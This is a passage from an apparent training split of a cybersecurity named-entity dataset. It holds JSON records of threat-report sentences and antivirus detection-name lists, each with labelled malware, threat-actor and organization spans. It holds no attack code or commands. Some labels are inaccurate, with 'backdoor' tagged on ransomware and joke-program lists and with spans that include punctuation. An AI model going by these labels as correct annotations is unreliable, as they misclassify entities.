Trojan[Dropper]/Win32.Neblso Trojan-Dropper.Win32.Neblso Dropper/Win32.Xema.C62110 TrojanDropper.Neblso Win32/TrojanDropper.Neblso Trojan.MultiDrop!Nb+sQh+u4tI W32/Dropper.BBBT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005019", "source": "cyner2_train"}} {"text": "Bitcoin was the preferred transaction currency.", "spans": {}, "info": {"id": "cyner2_train_005020", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.RedSpy.Win32.12 Trojan.Heur.E7FD56 Win32.Trojan.WisdomEyes.16070401.9500.9966 W32/Backdoor2.WQR Backdoor.Trojan Backdoor.Win32.RedSpy.12 Trojan.Win32.RedSpy.bnfsv Backdoor.Win32.A.RedSpy.407552 BackDoor.Redspy.12 
W32/Backdoor.ZOHG-8805 Trojan[Backdoor]/Win32.RedSpy Backdoor:Win32/RedSpy.1_2 Backdoor.Win32.RedSpy.12 Trojan/Win32.Banker.C143433 Backdoor.RedSpy Backdoor.RedSpy!KQ5NSrZfjaE W32/RedSpy.V12!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005021", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9917 Trojan.Cridex Trojan.Win64.PackedENT.exqnqt Trojan.PackedENT.61 BehavesLike.Win64.PdfCrypt.bm W64/Trojan.WJME-6640 Trojan.Mikey.D1231F Trojan.Dridex Trojan.Win64.Krypt Trj/CI.A Win32/Trojan.cb1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005022", "source": "cyner2_train"}} {"text": "One more targeted attack against Ukraine that used spear phishing to deliver the DarkTrack backdoor through a fake prescription of the Minister of Defense of Ukraine.", "spans": {"MALWARE: DarkTrack backdoor": [[81, 99]], "ORGANIZATION: the Minister of Defense of Ukraine.": [[131, 166]]}, "info": {"id": "cyner2_train_005023", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Tvt!O Trojan/Korplug.j Win32.Trojan.WisdomEyes.16070401.9500.9991 Backdoor.Trojan BKDR_THOPER.SMZTDE Trojan.Korplug.Win32.8 BKDR_THOPER.SMZTDE W32/Trojan.LEDO-1330 Trojan/Tvt.ay Trojan/Win32.Tvt Trojan.Kazy.D1C8B5 Backdoor:Win32/Thoper.F!dha Backdoor/Win32.Etso.R19357 Trojan.Tvt!rB4pBoPmMmk Trojan.Kazy Win32/Trojan.9b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005025", "source": "cyner2_train"}} {"text": "Since then, the number of cases using PoisonIvy in such attacks decreased, and there was no special variant with expanded features seen in the wild.", "spans": {"MALWARE: PoisonIvy": [[38, 47]]}, "info": {"id": "cyner2_train_005026", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLTMSTRI.Trojan Trojan/Qhost.admt Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Qhosts Trojan.Win32.Qhost.rfrep Troj.W32.Qhost.admt!c 
Trojan.FakeAV.10958 Trojan.Qhost.Win32.9572 W32/Trojan.AEUL-0771 Trojan/Qhost.eht TR/Qhost.eozdy Trojan/Win32.Qhost Trojan.Graftor.Elzob.D22D4 Trojan.Qhost Trojan.HostsMod Trj/CI.A Win32/Qhost.ORK Trojan.Qhost!OWegFrReFAQ Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005028", "source": "cyner2_train"}} {"text": "The backdoor Trojan authors have called it XAgentOSX, which shares the name XAgent with one of Sofacy's Windows-based Trojan and references Apple's previous name for macOS, OS X.", "spans": {"THREAT_ACTOR: The backdoor Trojan authors": [[0, 27]], "MALWARE: XAgentOSX,": [[43, 53]], "MALWARE: XAgent": [[76, 82]], "THREAT_ACTOR: Sofacy's": [[95, 103]], "MALWARE: Windows-based Trojan": [[104, 124]], "ORGANIZATION: Apple's": [[140, 147]], "SYSTEM: macOS, OS X.": [[166, 178]]}, "info": {"id": "cyner2_train_005029", "source": "cyner2_train"}} {"text": "Trend Micro first discovered the Alice ATM malware family in November 2016 as result of our joint research project on ATM malware with Europol EC3.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "MALWARE: Alice ATM malware family": [[33, 57]], "MALWARE: ATM malware": [[118, 129]], "ORGANIZATION: Europol EC3.": [[135, 147]]}, "info": {"id": "cyner2_train_005030", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Veediem Trojan.Razy.D212D5 Win32.Trojan.WisdomEyes.16070401.9500.9585 HackTool.Win32.AllinOne.g Tool.Allinone.1 BehavesLike.Win32.Fujacks.tm HackTool.Win32.AllinOne.g Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005032", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ismdoor W32/Ismdoor.A Trojan.MSIL.Ismdoor.a Trojan.Win32.Ismdoor.euvcaa Troj.Msil.Ismdoor!c Trojan.Ismdoor.Win32.2 Trojan.MSIL.Ismdoor W32/Trojan.WGWW-8625 Trojan.MSIL.hjyc Trojan/MSIL.Ismdoor Trojan.MSIL.Ismdoor.a Trojan/Win32.Ismdoor.C2249090 Trojan.MSIL.Ismdoor Trj/WLT.D Trojan.Ismdoor MSIL/Ismdoor.A 
Msil.Trojan.Ismdoor.Efax Trojan.Ismdoor! W32/Ismdoor.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005033", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Backdoor.PCClient.TCH Backdoor.PcClient Backdoor.PCClient.TCH BKDR_PCCLIEN.AFR Win32.Trojan.WisdomEyes.16070401.9500.9973 Backdoor.Formador BKDR_PCCLIEN.AFR Backdoor.PCClient.TCH Backdoor.Win32.PcClient.gehc Backdoor.PCClient.TCH Trojan.Win32.PcClient.evwdyc Trojan.Win32.Z.Pcclient.617695.A Backdoor.W32.Pcclient!c Backdoor.PCClient.TCH Backdoor.PCClient.TCH Trojan.Proxy.20157 Backdoor.PcClient.Win32.30956 BehavesLike.Win32.PWSZbot.jc Trojan.Win32.Enigma W32/Trojan.MPTU-6658 Trojan[Backdoor]/Win32.PcClient Backdoor.PCClient.TCH Backdoor.Win32.PcClient.gehc Trojan/Win32.PcClient.C22919 TScope.Malware-Cryptor.SB Win32.Backdoor.Pcclient.Ebqc W32/Bckdr.Z!tr Win32/Backdoor.599", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005034", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_GE.3396767B Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.3396767B Win.Tool.Winactivator-1 Win32.Riskware.WinActivator.A Trojan.Win32.Kryptik.ernenh BehavesLike.Win32.PUPXAG.tc W32/Trojan.PMWL-5504 HackTool.WinActivator Trj/CI.A Trojan.MSIL.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005036", "source": "cyner2_train"}} {"text": "The PC version has the ability to achieve complete remote control over the victim machine, including monitoring webcams and microphones.", "spans": {"SYSTEM: PC version": [[4, 14]], "SYSTEM: victim machine,": [[75, 90]]}, "info": {"id": "cyner2_train_005038", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D19050 Trojan.Powerduke Trojan:Win32/Yedob.A!dha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005039", "source": "cyner2_train"}} {"text": "As an example, the following email was sent to a Turkish government 
organization using a lure of purported new portal logins for an airline's website.", "spans": {"ORGANIZATION: Turkish government organization": [[49, 80]]}, "info": {"id": "cyner2_train_005040", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9992 TR/Crypt.ZPACK.wqbfr Trojan[Downloader]/Win32.MapsGory Trojan.Razy.D3751F Trojan/Win32.MapsGory.C2205147 Malware-Cryptor.Limpopo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005041", "source": "cyner2_train"}} {"text": "After launching, it hides its presence on the system and checks the defined Twitter account at regular intervals for commands.", "spans": {"SYSTEM: system": [[46, 52]], "SYSTEM: Twitter account": [[76, 91]]}, "info": {"id": "cyner2_train_005042", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Putabmow.RF5 Trojan.Downloader.Wmbatupd Win.Adware.Graftor-5699 Variant.Adware.Graftor.mrlb Adware.Wombat.1 Trojan.FakeAV.Win32.319646 BehavesLike.Win32.BrowseFox.fh Trojan-Downloader.Win32.Putabmow TR/Dldr.Putabmow.AC TrojanDownloader:Win32/Putabmow.A PUP/Win32.Graftor.R158727 Win32/Trojan.a6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005045", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.EggDrop.u BackDoor.EggDrop.16 Backdoor.Win32.EggDrop Trojan[Backdoor]/Win32.EggDrop.u Backdoor.Win32.EggDrop.u Backdoor:Win32/Dropegg.K Trojan/Win32.Eggdrop.R129522 Backdoor.EggDrop Win32/EggDrop.16", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005047", "source": "cyner2_train"}} {"text": "Once installed the bootkit infects the operating system with a backdoor at the early booting stage.", "spans": {"MALWARE: bootkit": [[19, 26]], "SYSTEM: operating system": [[39, 55]], "MALWARE: backdoor": [[63, 71]]}, "info": {"id": "cyner2_train_005048", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Notpa 
Backdoor.Win32!O Backdoor.Notpa Backdoor.Notpa.Win32.4 Backdoor.W32.Notpa.l1pr Backdoor.Notpa W32/Backdoor.YTLZ-6459 Backdoor.Trojan BKDR_NOTPA.A Win.Trojan.NotPad-1 Backdoor.Win32.Notpa Backdoor.Notpa Trojan.Win32.Notpa.dkrv Backdoor.Notpa Backdoor.Win32.BackDoor.2_02 Backdoor.Notpa BackDoor.Zemac.200 BKDR_NOTPA.A W32/Backdoor2.EGAF TR/Notpad.Srv_#1 Trojan[Backdoor]/Win32.Notpa Win32.Hack.Notpa.kcloud Backdoor.Win32.Notpa.10240 Backdoor.Win32.Notpa Backdoor.Notpa Win-Trojan/Notpa.10240 Backdoor.Notpa Win32/BackDoor.2_02 Win32.Backdoor.Notpa.Wwoe Backdoor.Notpa!UhKbM28gXZk Backdoor.Win32.Notpa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005049", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Ninja Win32.Trojan.WisdomEyes.151026.9950.9999 Trojan-Ransom.Win32.Democry.a Trojan.Encoder.4608 Trojan.Filecoder.Win32.2542 BehavesLike.Win32.BadFile.tz TR/Symmi.sqfb W32/Filecoder.NGQ!tr Trojan.Symmi.D1F61 Trojan/Win32.Filecoder Ransom:Win32/SieteCrypto.A BScope.P2P-Worm.Palevo Win32.Trojan.Symmi.Wskd Trojan.Democry! 
Trojan.Win32.Filecoder Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005051", "source": "cyner2_train"}} {"text": "operation targeting individuals in Ukraine.", "spans": {"ORGANIZATION: individuals": [[20, 31]]}, "info": {"id": "cyner2_train_005052", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeDocD.fam.Trojan Worm.Hybris.PLI Worm.Win32.AutoRun!O Worm.AutoIt.Yuner.A Worm.Hybris.PLI Trojan/Yuner.b Worm.Hybris.PLI Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.SEDY-1174 W32.Badday.A WORM_AUTORUN.BWK Worm.Hybris.PLI Worm.Win32.AutoIt.r Worm.Hybris.PLI Worm.Win32.AutoIt.261440 W32.W.AutoIt.l3OL Worm.Hybris.PLI Worm.Win32.AutoIt.~AN Trojan.AVKill.31317 Worm.AutoIt.Win32.2853 WORM_AUTORUN.BWK BehavesLike.Win32.YahLover.dc W32/Worm.MWD TrojanDownloader.JS.hi WORM/Autorun.55698 GrayWare[AdWare]/Win32.Yuner.a Worm:Win32/Yuner.A Worm.Win32.AutoIt.r Win32/Hybris.worm.261539 W32/YahLover.worm Worm.Autoit.Autorunner Trojan.Injector.AutoIt W32/Sohanat.GW.worm I-Worm.Yuner.B Win32/Yuner.B Worm.Win32.AutoRun.f Worm.Win32.AutoRun Trojan.Win32.AutoIt.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005053", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Yarner.D@mm Worm/W32.Yarner.437760.D W32.Yarner Trojan.Win32.Yarner.eokq W32/Yarner.D@mm Win32.Yarner Worm.Yarner.D Email-Worm.Win32.Yarner.d Win32.Yarner.D@mm I-Worm.Yarner.D I-Worm.Win32.Yarner.D Worm.Win32.Yarner.D Win32.Yarner.D@mm Win32.HLLM.Yarner.3 W32/YaW-Setup.3 I-Worm/Yarner.d Worm.Yarner.d.kcloud Worm:Win32/Yarner.C@mm Win32/Yarner.worm.437760.C Win32.Yarner.D@mm W32/Yarner.D@mm Worm.Yarner.d Malware.Yarner Win32/Yarner.D Worm.Yarner.d Email-Worm.Win32.Yarner.D W32/Yarner.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005055", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameRWALXAF.Worm Trojan.Win32.VB!O Trojan.Mofksys.A Worm.Mofksys Trojan/VB.osk 
Win32.Trojan.VB.kc W32.Gosys Win32/Mofksys.C Trojan-Ransom.Win32.Blocker.oow Trojan.Win32.Blocker.covlpo Troj.W32.Swisyn.mzNn Trojan.VbCrypt.250 Trojan.VB.Win32.59196 BehavesLike.Win32.Swisyn.dh Trojan.Win32.VB Trojan[Ransom]/Win32.Blocker Worm:Win32/Mofksys.A Trojan.Win32.A.VB.192512.N Trojan-Ransom.Win32.Blocker.oow Trojan/Win32.Swisyn.R1452 W32/Swisyn.ag MAS.Trojan.VB.01047", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005056", "source": "cyner2_train"}} {"text": "Neutrino Exploit Kit EK appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits.", "spans": {"MALWARE: Neutrino Exploit Kit": [[0, 20]], "MALWARE: new exploits.": [[114, 127]]}, "info": {"id": "cyner2_train_005057", "source": "cyner2_train"}} {"text": "We immediately contacted psychcentral about this infection as early as we have discovered it.", "spans": {}, "info": {"id": "cyner2_train_005058", "source": "cyner2_train"}} {"text": "Yesterday morning, August 5, a Firefox user informed us that an advertisement on a news site in Russia was serving a Firefox exploit that searched for sensitive files and uploaded them to a server that appears to be in Ukraine.", "spans": {"SYSTEM: Firefox user": [[31, 43]], "MALWARE: Firefox exploit": [[117, 132]], "SYSTEM: server": [[190, 196]]}, "info": {"id": "cyner2_train_005059", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Welranax Trojan/Delf.sjo Win32.Trojan.Delf.iv not-a-virus:AdWare.Win32.Delf.gum Trojan.Win32.Z.Delf.409600.D Adware.Delf.Win32.2253 Trojan-Dropper.Delf W32/Trojan.ZLEU-3835 GrayWare[AdWare]/Win32.Delf not-a-virus:AdWare.Win32.Delf.gum Trojan:Win32/Welranax.A Trojan/Win32.Hupigon.C979817 AdWare.Delf Trj/CI.A Win32/Delf.SJO Win32.Adware.Delf.Wrgd PUA.Delf! 
Win32/Trojan.e91", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005061", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.94C0 Trojan.Barys.DE38F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005063", "source": "cyner2_train"}} {"text": "Foreign policy, future of the US Army Officer Corps, and economic development are only a few of the keywords that threat actors have been using in spear-phishing attacks against directors and project managers of technology-inclined US government contractors.", "spans": {"ORGANIZATION: US": [[30, 32]], "ORGANIZATION: economic development": [[57, 77]], "THREAT_ACTOR: threat actors": [[114, 127]], "ORGANIZATION: directors": [[178, 187]], "ORGANIZATION: project managers": [[192, 208]], "ORGANIZATION: US government contractors.": [[232, 258]]}, "info": {"id": "cyner2_train_005064", "source": "cyner2_train"}} {"text": "This extensive campaign infected over 14 million devices, rooting 8 million of them with an unprecedented success rate.", "spans": {"THREAT_ACTOR: campaign": [[15, 23]], "SYSTEM: devices,": [[49, 57]], "VULNERABILITY: rooting": [[58, 65]]}, "info": {"id": "cyner2_train_005065", "source": "cyner2_train"}} {"text": "Affiliates only had to dole out at least 5% of their revenue to continue distributing the ransomware.", "spans": {}, "info": {"id": "cyner2_train_005066", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_DROPPR.SMC Win32.Trojan.WisdomEyes.16070401.9500.9967 TROJ_DROPPR.SMC Win.Downloader.54186-1 Trojan.Win32.Small.depzsf Trojan.MulDrop4.31372 BehavesLike.Win32.FakeAlertSecurityTool.cc Trojan[Downloader]/Win32.Dadobra TrojanDropper:Win32/Preald.A Trojan/Win32.Vilsel.C888605 TrojanDownloader.Dadobra Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005067", "source": "cyner2_train"}} {"text": "In January of 2016, a tiny downloader named Godzilla Loader was advertised in the Damagelab 
forum.", "spans": {"MALWARE: tiny downloader": [[22, 37]], "MALWARE: Godzilla Loader": [[44, 59]], "ORGANIZATION: Damagelab forum.": [[82, 98]]}, "info": {"id": "cyner2_train_005069", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeTC.Win32.3 W32/Trojan2.OZHB Win32/FakeTC.A Win32.Trojan.FakeTC.A Trojan.FakeTC.3 W32/Trojan.MTLD-1219 Trojan/FakeTC.c Trojan/Win32.FakeTC Trojan.FakeTC Backdoor.Bot Trojan.Win32.Faketc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005070", "source": "cyner2_train"}} {"text": "Typically, attackers do not use patterns for very long, because security professionals eventually identify and subsequently block these patterns.", "spans": {"THREAT_ACTOR: attackers": [[11, 20]], "ORGANIZATION: security professionals": [[64, 86]]}, "info": {"id": "cyner2_train_005072", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke.Winerror Joke.Winerror Trojan.Winerror Hoax.W16.BadJoke.WinError!c Joke.Winerror WinError.Trojan Joke.WinError Hoax.Win16.BadJoke.WinError Riskware.Win16.WinError.hwcm Joke.Winerror ApplicUnwnt.Win16.BadJoke.WinError Tool.BadJoke.Win16.8 not-virus:Joke.Win16.WinError JOKE/Winerror.A HackTool[Hoax]/Win16.WinError Joke.Winerror Hoax.Win16.BadJoke.WinError Trojan.Win16.BadJoke.WinError Win16.Trojan-psw.Badjoke.Dygs Hoax.Win16.BadJoke.WinError Joke.Winerror", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005073", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PackedCRTD.Win32.9317 Win32.Trojan.WisdomEyes.16070401.9500.9843 Win32.Trojan.Falsesign.Taoo Trojan.PWS.Banker1.22573 Trojan:Win32/Banker.AF Win32/Trojan.115", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005074", "source": "cyner2_train"}} {"text": "The malware comes equipped with a variety of features and can be purchased for $50 directly from the author.", "spans": {}, "info": {"id": "cyner2_train_005075", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: Ransom.Nemesis.S1305933 Trojan.Deshacop.Win32.847 Trojan.Ransom.Nemesis.8 Win32.Trojan.WisdomEyes.16070401.9500.9551 Win32.Trojan-Ransom.Nemesis.B Trojan-Ransom.Win32.Cryptoff.xe Heur.Packed.Unknown Trojan.Encoder.15133 Trojan[Ransom]/Win32.Snocry Ransom:Win32/CryptoLemPiz.A Trojan-Ransom.Win32.Cryptoff.xe Trojan/Win32.Snocry.C1923609 BScope.Trojan-Ransom.Snocry Ransom.Cerber Trojan.Win32.Filecoder Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005076", "source": "cyner2_train"}} {"text": "In the case of the CVE-2017-0199 Word exploit, we have observed this in a much more accelerated time scale.", "spans": {"MALWARE: Word exploit,": [[33, 46]]}, "info": {"id": "cyner2_train_005077", "source": "cyner2_train"}} {"text": "BlackBerry researchers have observed a new campaign by the Russian state-sponsored threat group, known as APT29, targeting European Union countries and their diplomatic systems, including that of Poland's ambassador to the United States.", "spans": {"ORGANIZATION: BlackBerry researchers": [[0, 22]], "THREAT_ACTOR: new campaign": [[39, 51]], "THREAT_ACTOR: the Russian state-sponsored threat group,": [[55, 96]], "THREAT_ACTOR: APT29,": [[106, 112]], "SYSTEM: diplomatic systems,": [[158, 177]], "ORGANIZATION: Poland's ambassador to the United States.": [[196, 237]]}, "info": {"id": "cyner2_train_005080", "source": "cyner2_train"}} {"text": "Fortinet detects this threat as W32/Miner.", "spans": {"ORGANIZATION: Fortinet": [[0, 8]], "MALWARE: threat": [[22, 28]]}, "info": {"id": "cyner2_train_005086", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.Duberath.B3 Backdoor.VB.Win32.14561 Backdoor.W32.VB.mtc!c Backdoor/VB.mtc BKDR_VBBOT.AM W32/VBBot.A Trojan.Dosvine BKDR_VBBOT.AM Win.Trojan.Hydraq-30 Backdoor.Win32.VB.mtc Trojan.Win32.VB.cuyqz Backdoor.Win32.VBbot.118784 Trojan.DownLoader2.62750 Backdoor.IRCBot BehavesLike.Win32.VBObfus.ct Trojan.Win32.Duberath 
W32/VBBot.DXMJ-6902 Trojan[Backdoor]/Win32.VB Backdoor.Win32.VB.mtc Trojan:Win32/Duberath.B Backdoor.VBbot.A Backdoor.IRCBot Trojan.Crypted.18705 Win32.Backdoor.Vb.Wrha Trojan.VBbot!c3mtyEoqCqM Win32/Backdoor.fdf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005091", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod3af.Trojan.e4b3 Trojan-Downloader/W32.Zlob.62877 Trojan.Dropper W32/Trojan2.NNPL Downloader.HJFG TROJ_SPNR.15L411 Trojan.Downloader.NSIS-3 Trojan-Downloader.Win32.NSIS.hn Trojan.DownLoader3.61765 TROJ_SPNR.15L411 Heuristic.BehavesLike.Win32.Downloader.D TrojanDownloader:Win32/Ocibt.A Win-Trojan/Downloader.62877 W32/Trojan.MONE-7612 TrojanDownloader.hn Trj/CI.A W32/Dloader.HG!tr.NSIS Dropper.Instaler.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005093", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Patpoopy.Win32.18 Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.MPOM-1589 Win.Trojan.PupyRat-5710268-0 Trojan.Win32.Patpoopy.ewuxjt Trojan.Win32.Z.Zusy.3419648.Q Python.PuPy.20 BehavesLike.Win32.Injector.wc Trojan.Zusy.D4035B Trojan/Win32.Shelma.C2361381 Trojan.Win64.Shelma Trj/CI.A Win32.Trojan.Patpoopy.Lpky Trojan.Win64.Shelma RAT.Pupy W32/Patpoopy.E!tr Win32/Trojan.2c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005094", "source": "cyner2_train"}} {"text": "We call this new group RTM- it uses custom malware, written in Delphi, that we cover in detail in later sections.", "spans": {"THREAT_ACTOR: new group RTM-": [[13, 27]], "MALWARE: custom malware,": [[36, 51]], "SYSTEM: Delphi,": [[63, 70]]}, "info": {"id": "cyner2_train_005095", "source": "cyner2_train"}} {"text": "The report includes a review of the malware's sales procedure and customer reviews, as well as a full technical analysis of its multiple plugins.", "spans": {}, "info": {"id": "cyner2_train_005096", "source": "cyner2_train"}} {"text": "Since February 
this year Antiy CERT has detected a new round of phishing activities using GuLoader to deliver the AgentTesla secret-stealing Trojan.", "spans": {"ORGANIZATION: Antiy CERT": [[25, 35]], "MALWARE: GuLoader": [[90, 98]], "MALWARE: the AgentTesla secret-stealing Trojan.": [[110, 148]]}, "info": {"id": "cyner2_train_005099", "source": "cyner2_train"}} {"text": "Four of them had more than 10,000 installs and one of them had more than 50,000 installs.", "spans": {}, "info": {"id": "cyner2_train_005101", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Win64 Win32.Trojan.WisdomEyes.16070401.9500.9986 Win64.Trojan-qqpass.Qqrob.Lmug BehavesLike.Win32.Rootkit.dh HackTool.Mimikatz Trojan.PSW.Mimikatz.acm Trojan[PSW]/Win64.Mimikatz HackTool:Win32/Mimikatz.A!dha Troj.Psw.Win64.Mimikatz!c BScope.TrojanPSW.Mimikatz Win32/Trojan.PSW.a2b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005103", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Kinkisc.Worm Trojan.Dropper.SRY TrojanDownloader.Zlob.A4 Trojan.Fanny.MB TROJ_ZLOB.SMFM W32.Fanni Win32/Zlob.PL TROJ_ZLOB.SMFM Win.Worm.Autorun-7948 Trojan.Dropper.SRY Trojan.Win32.EquationDrug.n Trojan.Dropper.SRY Trojan.Win32.Downloader.184320.CW Trojan.Dropper.SRY Trojan.DownLoad2.36935 BehavesLike.Win32.Backdoor.ch Worm.Win32.Funny Worm/Win32.AutoRun Worm:Win32/Fanys.A Trojan.Win32.EquationDrug.n Trojan.Dropper.SRY Worm.Fanny Trojan.Dropper.SRY Trojan.Win32.Downloader.tyo Worm.Win32.Fanny.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005104", "source": "cyner2_train"}} {"text": "Archive files ZIP, RAR, ACE, and ISOs containing EXE payloads", "spans": {"MALWARE: EXE payloads": [[49, 61]]}, "info": {"id": "cyner2_train_005105", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Autoit Trojan.Symmi.D10095 Trojan.Win32.Autoit.exnvng Trojan.Win32.Z.Autoit.1079042 Troj.W32.Autoit!c Trojan.Inject1.38999 Trojan.AutoIt.Win32.7 
BehavesLike.Win32.Trojan.th Trojan.Win32.Eupuds Trojan.Autoit.ixi Trojan:Win32/BrobanEup.A Trojan.Autoit.Banker Win32.Trojan.Autoit.Szbl W32/Autoit.AAV!tr Win32/Trojan.839", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005106", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Mirleg.24544 Backdoor/Mirleg.a TROJ_LEMIR.KM Win.Trojan.Mirleg-1 Backdoor.Win32.Mirleg.a Trojan.Win32.Mirleg.dkdm Backdoor.Win32.Mirleg.24544 Backdoor.W32.Mirleg.a!c BackDoor.Mirshell Backdoor.Mirleg.Win32.3 TROJ_LEMIR.KM BehavesLike.Win32.VTFlooder.mc Trojan[Backdoor]/Win32.Mirleg Backdoor.Win32.Mirleg.a Backdoor:Win32/Mirle.A Backdoor.Mirleg Bck/Lmir.D Win32.Backdoor.Mirleg.Tbik Trojan.PSW.LMir!RFMQExC82yY Backdoor.Win32.EggDrop W32/BDoor.BCV!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005110", "source": "cyner2_train"}} {"text": "We have named this tool BBSRAT.", "spans": {"MALWARE: tool BBSRAT.": [[19, 31]]}, "info": {"id": "cyner2_train_005111", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.VB.EV Heuristic.Crypted", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005112", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Farfli.20223 Win32.Trojan.Farfli.t W32/Trojan.LJSX-0343 Backdoor.Trojan BKDR_ZEGOST.SM44 Trojan.Win32.Dwn.dxihqn TrojWare.Win32.AntiAV.~D Trojan.DownLoader16.26781 Trojan.Farfli.Win32.30753 BKDR_ZEGOST.SM44 BehavesLike.Win32.Backdoor.kc BDS/Backdoor.davcs Trj/CI.A Trojan.Farfli!Hj4dzX9BZUM Trojan-PWS.Win32.Bjlog", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005114", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Hanove W32/Trojan.BLPJ-3540 Backdoor.Trojan Trojan-Dropper.Win32.Dapato.degm Trojan.Win32.Drop.ddlhu Trojan.MulDrop2.26538 BehavesLike.Win32.Trojan.fh TrojanDropper.Dapato.owp Trojan-Dropper.Win32.Dapato.degm Backdoor:Win32/Hanove.A 
Trojan/Win32.Hanove.C240436 Win32.Trojan-dropper.Dapato.Ebhb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005115", "source": "cyner2_train"}} {"text": "Its name originates from the Arabic word maktub which means this is written or this is fate", "spans": {}, "info": {"id": "cyner2_train_005116", "source": "cyner2_train"}} {"text": "In this version of Ursnif I have also encountered an internal peer-to-peer communication which could possibly add the ability for the sample to communicate with other Ursnif peers over the same network.", "spans": {"MALWARE: Ursnif": [[19, 25], [167, 173]]}, "info": {"id": "cyner2_train_005118", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownloaderHC.Trojan Trojan-Ransom.Win32.FraudBlocker!O Trojan/VB.bn TROJ_RANSVB.SMA Win32.Trojan.WisdomEyes.16070401.9500.9983 